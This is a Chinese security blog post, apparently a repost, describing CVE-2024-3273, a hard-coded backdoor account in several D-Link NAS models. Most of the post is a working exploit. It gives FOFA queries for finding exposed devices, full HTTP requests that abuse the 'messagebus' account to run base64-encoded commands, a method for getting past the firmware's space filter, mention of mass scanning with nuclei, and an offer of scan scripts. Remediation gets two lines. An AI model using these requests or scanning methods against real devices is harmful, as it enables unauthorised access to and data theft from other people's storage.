D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞

admin 2024年12月24日13:50:45评论52 views字数 1811阅读6分2秒阅读模式

使用说明:本篇文章旨在提供网络安全技术研究的信息和知识,以供信息技术专业人士、学者和爱好者学习和交流。我们鼓励读者提升自身的技术能力,增强网络安全意识,并为维护网络空间的安全做出贡献。

一、漏洞简介

    D-Link 是一家知名的网络设备制造商,提供各种类型的 NAS 解决方案,适用于家庭和企业用户。该漏洞的关键问题在于设备固件中存在一个硬编码的后门帐户。攻击者可以通过这个后门帐户在没有合法用户授权的情况下访问NAS设备,进而获取存储在设备中的敏感数据,或者在设备上执行任意操作。

二、漏洞影响

  • D-Link DNS-320L

  • D-Link DNS-325

  • D-Link DNS-327L

三、漏洞测绘

fofa语法:一:"Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"二:fid="hWN+yVVhLzKJaLkd/ITHpA=="

四、漏洞复现

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1Host: XXXXXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1X-Forwarded-For: 10.10.10.5X-Originating-IP: 10.10.10.5Priority: u=0, i

D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞

五、批量扫描

利用开源工具nucle编写脚本批量扫描:

D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞

六、检测规则绕过

当我们使用含有空格的命令,比如uname -a,cat /etc/passwd等时,空格会被过滤,命令无法执行成功。

通过对固件提取,逆向分析,找到检测规则代码,如下图:

 D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞

通过对ls "空格"   进行如下字符替换绕过,再用base64编码即可绕过。

(注:此处不要用网页版base64编码(网页版编码未成功),使用linux系统内置base64进行编码)

D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=bHMJLw== HTTP/1.1Host: XXXXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1X-Forwarded-For: 10.10.10.5X-Originating-IP: 10.10.10.5Priority: u=0, i

D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞

七、漏洞危害

1.未授权访问

2.权限控制

3.数据泄露

八、漏洞修复

1.固件升级至新版本。

2.更改默认配置文件

需要批量扫描脚本和固件的请并回复CVE-2024-3273

原文始发于微信公众号(安全技术达人):D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月24日13:50:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   D-LinkNAS D-Link NAS设备存在后门帐户(CVE-2024-3273)RCE漏洞https://cn-sec.com/archives/3498855.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息